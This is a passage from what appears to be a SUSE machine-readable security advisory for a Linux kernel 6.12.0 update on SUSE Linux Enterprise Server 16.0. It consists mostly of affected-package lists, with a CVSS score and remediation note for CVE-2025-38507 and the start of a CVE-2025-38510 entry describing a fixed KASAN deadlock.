"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38507",
"url": "https://www.suse.com/security/cve/CVE-2025-38507"
},
{
"category": "external",
"summary": "SUSE Bug 1248188 for CVE-2025-38507",
"url": "https://bugzilla.suse.com/1248188"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38507"
},
{
"cve": "CVE-2025-38510",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38510"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkasan: remove kasan_find_vm_area() to prevent possible deadlock\n\nfind_vm_area() couldn\u0027t be called in atomic_context. If find_vm_area() is\ncalled to reports vm area information, kasan can trigger deadlock like:\n\nCPU0 CPU1\nvmalloc();\n alloc_vmap_area();\n spin_lock(\u0026vn-\u003ebusy.lock)\n spin_lock_bh(\u0026some_lock);\n \u003cinterrupt occurs\u003e\n \u003cin softirq\u003e\n spin_lock(\u0026some_lock);\n \u003caccess invalid address\u003e\n kasan_report();\n print_report();\n print_address_description();\n kasan_find_vm_area();\n find_vm_area();\n spin_lock(\u0026vn-\u003ebusy.lock) // deadlock!\n\nTo prevent possible deadlock while kasan reports, remove kasan_find_vm_area().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
